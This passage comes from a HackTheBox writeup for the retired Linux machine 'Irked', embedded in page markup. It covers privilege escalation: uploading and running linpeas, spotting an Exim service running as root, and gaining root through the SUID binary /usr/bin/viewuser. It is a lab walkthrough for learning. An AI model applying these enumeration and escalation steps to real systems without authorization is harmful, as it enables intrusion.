left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAAsTAAALEwEAmpwYAAABfUlEQVQoz1WQ6VKEMBCEeRh11wvITQghHAusoMWq7/8s7SSUVvmjq4eQ6XwzWS45wtRh2zdstw3LdsW0XjGuK1wr8Hnr8bUP+L4N+Nx7rG8d+QX7R8D+HvCxtan+on9dr5FV3mNejsOotimTAoWFVuIyKHhXwMhHVPoJmtyoQ1qe/7kSj8g4Z9hWIrw6TKPGMlWpUfEH8PIuSbL7JBGdzgV7ID+nWlKtxAmaFM8yay3Gocb72uDSK8wXQ2N4ItNo6hxdy1DbEt4rdEETPSMXcPYlkQfPYM0zUZ4gOBHOy0SBzd8uoiJl8CUaF4Ms6rqGc45qD2M0rBVpxLp6SY8eqziBlRSolMIwdEToMfaSCCssRBndWkNhFlorcM4hhEjiXKAoXonoGDuNTHvM8ydk8YJrHObZU6hLdG9zhXkKCIHUhUTWth5SSnDGU3gMLcsihRoKE+xMjxTI4qXGN+g62uFoEmVTl4mMMWoQOTW9QorntKOD6lD8jv5LJyjrBxnhCs4flUZTAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/71dd7496c8d8b96d0ea7310b9b13b2c9/8ac56/image-20220806083220617.webp 240w,\n/static/71dd7496c8d8b96d0ea7310b9b13b2c9/d3be9/image-20220806083220617.webp 480w,\n/static/71dd7496c8d8b96d0ea7310b9b13b2c9/0be55/image-20220806083220617.webp 592w\"\n              sizes=\"(max-width: 592px) 100vw, 592px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/71dd7496c8d8b96d0ea7310b9b13b2c9/8ff5a/image-20220806083220617.png 240w,\n/static/71dd7496c8d8b96d0ea7310b9b13b2c9/e85cb/image-20220806083220617.png 480w,\n/static/71dd7496c8d8b96d0ea7310b9b13b2c9/1b853/image-20220806083220617.png 592w\"\n            sizes=\"(max-width: 592px) 100vw, 592px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/71dd7496c8d8b96d0ea7310b9b13b2c9/1b853/image-20220806083220617.png\"\n            alt=\"image-20220806083220617\"\n            title=\"image-20220806083220617\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>With that, I obtained the user flag.</p>\n<h2 id=\"privilege-escalation\" style=\"position:relative;\"><a href=\"#privilege-escalation\" aria-label=\"privilege escalation permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Privilege Escalation</h2>\n<p>I started by running linpeas.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">scp</span> /home/kali/Hacking/Tools/linpeas.sh djmardov@<span class=\"token variable\">$RHOST</span>:/home/djmardov\n\n$ ./linpeas.sh -a <span class=\"token operator\">|</span> <span class=\"token function\">tee</span> linpeas.txt</code></pre></div>\n<p>The output showed an SMTP process running on the local address.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token number\">25</span>/tcp  <span class=\"token function\">open</span>  smtp    Exim smtpd\n<span class=\"token operator\">|</span> smtp-commands: irked Hello localhost <span class=\"token punctuation\">[</span><span class=\"token number\">127.0</span>.0.1<span class=\"token punctuation\">]</span>, SIZE <span class=\"token number\">52428800</span>, 8BITMIME, PIPELINING, HELP, \n<span class=\"token operator\">|</span>_ Commands supported: AUTH HELO EHLO MAIL RCPT DATA NOOP QUIT RSET HELP </code></pre></div>\n<p>Banner grabbing confirmed it was running <code class=\"language-text\">SMTP Exim 4.84_2</code>.</p>\n<p>The exim4 process was running as root.</p>\n<p>I tried a range of exploits for this but unfortunately none of them worked.</p>\n<p>Going back to linpeas, I noticed a binary at <code class=\"language-text\">/usr/bin/viewuser</code> that had the SUID bit set, and it appeared to allow executing an arbitrary shell script with root privileges.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\">#</span>\n Interesting Files ╠════════════════════════════════════\n<span class=\"token comment\">#</span>\n SUID - Check easy privesc, exploits and <span class=\"token function\">write</span> perms\n https://book.hacktricks.xyz/linux-unix/privilege-escalation<span class=\"token comment\">#sudo-and-suid</span>\n-rwsr-xr-x <span class=\"token number\">1</span> root root <span class=\"token number\">7</span>.2K May <span class=\"token number\">16</span>  <span class=\"token number\">2018</span> /usr/bin/viewuser <span class=\"token punctuation\">(</span>Unknown SUID binary<span class=\"token punctuation\">)</span></code></pre></div>\n<p>Using this binary to invoke a shell gave me root privileges.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 917px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/93a32e641e2dc216a3d1bad21d163c78/59000/image-20220806113215646.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 27.916666666666668%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABJElEQVQY002QaW6DMBhEOU0btU2g4AXb4IUlhCU0TdX7H2X64dCqP55GI+ynMcl0vWEYFzT9iP6yoBvmiO8GhPaMQhjqCz7u35jXO6S2KI3Heb/j24G+T9B1g7eUIVmWCdd1Rt+3sFajCQpdU6JtJLRKYUwBpRi0VpBSUNcRpUpwziOMsZhSShJeJ5KFKPE2xzwa3FaPr88W46DhqgyuziD4EYKEdV3/UZYlhBCE3BFIQrAInsOaEwQ7ILgCl7NC30q0gREcjWckTlHkr3HNJtrWbLmhlYqpKJOuM/C0YFtSqRMspVFHWvUOXb7F/kulTyQiuXOobU2/aFtaoWk8qsrAeYfE2YJW5VgXOmRS8OKw8xxh+YNHf0KWvYBxsT/1Af/XfwAF2ctQ+2af4QAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/93a32e641e2dc216a3d1bad21d163c78/8ac56/image-20220806113215646.webp 240w,\n/static/93a32e641e2dc216a3d1bad21d163c78/d3be9/image-20220806113215646.webp 480w,\n/static/93a32e641e2dc216a3d1bad21d163c78/f91b9/image-20220806113215646.webp 917w\"\n              sizes=\"(max-width: 917px) 100vw, 917px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/93a32e641e2dc216a3d1bad21d163c78/8ff5a/image-20220806113215646.png 240w,\n/static/93a32e641e2dc216a3d1bad21d163c78/e85cb/image-20220806113215646.png 480w,\n/static/93a32e641e2dc216a3d1bad21d163c78/59000/image-20220806113215646.png 917w\"\n            sizes=\"(max-width: 917px) 100vw, 917px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/93a32e641e2dc216a3d1bad21d163c78/59000/image-20220806113215646.png\"\n            alt=\"image-20220806113215646\"\n            title=\"image-20220806113215646\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>","fields":{"slug":"/hackthebox-linux-irked-en","tagSlugs":["/tag/hack-the-box-en/","/tag/linux-en/","/tag/easy-box-en/","/tag/english/"]},"frontmatter":{"date":"2022-08-04","description":"A writeup of the retired HackTheBox machine 'Irked'.","tags":["HackTheBox (en)","Linux (en)","EasyBox (en)","English"],"title":"HackTheBox Writeup: Irked (Easy/Linux)","socialImage":{"publicURL":"/static/dc4d8b7f8795f3c3d3489d9957d155f2/no-image.png"}}}},"pageContext":{"slug":"/hackthebox-linux-irked-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}